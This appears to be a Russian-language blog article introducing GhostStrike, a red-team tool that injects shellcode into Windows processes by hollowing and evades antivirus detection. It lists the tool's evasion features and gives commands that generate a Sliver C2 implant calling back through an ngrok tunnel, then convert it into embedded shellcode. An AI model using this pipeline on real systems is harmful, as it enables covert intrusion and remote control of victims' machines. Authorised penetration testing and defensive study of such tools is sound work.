GhostStrike — это инструмент для команд Red Team, который использует сложные методы обхода обнаружения и реализует технику Hollowing (внедрение в процессы) в Windows-системах.
Еще по теме: Обход антивируса с помощью Haskell
Техника Hollowing
Hollowing — это техника внедрения вредоносного кода, используемая для скрытого выполнения программ в операционных системах, таких как Windows.
Суть процесса заключается в следующем:
- Вредоносное ПО запускает безобидный или стандартный процесс (например, notepad.exe).
- После запуска процесс приостанавливается, а его исполняемый код в памяти выгружается (удаляется), оставляя пустую оболочку (отсюда и термин Hollow).
- На место удаленного кода загружается вредоносный шелл-код или другой исполняемый код, который затем начинает работать под видом легитимного процесса.
- Процесс возобновляется, и вредоносный код выполняется, маскируясь под нормальную работу программы.
Основная цель Hollowing — запустить вредоносный код так, чтобы он оставался незамеченным системами безопасности, так как снаружи процесс выглядит как законная программа.
Инструмент описанный в статье, предназначен для пентестеров (этичных хакеров). Использование GhostStrike для атак на частные лица или организации без их предварительного согласия является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши незаконные действия.
В статье «Как скрыть процессы от антивирусов», мы рассказывали про похожие техники — Herpaderping и Ghosting.
Возможности GhostStrike
- Используется собственный метод на основе хешей для динамического разрешения Windows API, что помогает избежать обнаружения инструментами безопасности, основанными на сигнатурах.
- Base64 для кодирования шелл-кода, чтобы скрыть его присутствие в памяти и усложнить статический анализ.
- Создает надежные криптографические ключи с использованием Windows Cryptography API для шифрования и расшифровки шелл-кода, добавляя дополнительный уровень защиты.
- Простой, но эффективный метод шифрования XOR, который защищает шелл-код во время процесса внедрения.
- Реализует технику сглаживания потока управления для запутывания пути выполнения кода, что усложняет его анализ как статическим, так и динамическим инструментам.
- Внедряет зашифрованный шелл-код в легитимный процесс Windows, позволяя ему исполняться незаметно, не вызывая подозрений.
Требования
Для сборки GhostStrike вам понадобится компилятор C++, такой как g++, clang++, или Visual Studio.
Дополнительные зависимости для сборки GhostStrike не требуются. Просто скомпилируйте исходный код компилятором C++, и можно приступать к работе!
Настройка и использование GhostStrike
Для настройки инструмента следуйте следующим шагам:
Сначала создаем сервис Ngrok командой:
|
1 |
ngrok tcp 443 |
Затем генерируем имплант Sliver C2 (полезная нагрузка, используемая для поддержания привилегий доступа на целевом компьютере):
|
1 |
generate --mtls x.tcp.ngrok.io --save YourFile.exe |
Запускаем слушатель:
|
1 |
mtls --lhost 0.0.0.0 --lport 443 |
Конвертируем файл в формат .bin:
|
1 |
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin |
Преобразуем в шелл-код на C++:
|
1 |
xxd -i YourFile.bin > YourFile.h |
Импортируем полученный YourFile.h в наш код.
Компилируем — и готово!
Я еще не пробовал тулзу в действии, поэтому по поводу эффективности ничего не могу сказать.
ПОЛЕЗНЫЕ ССЫЛКИ:
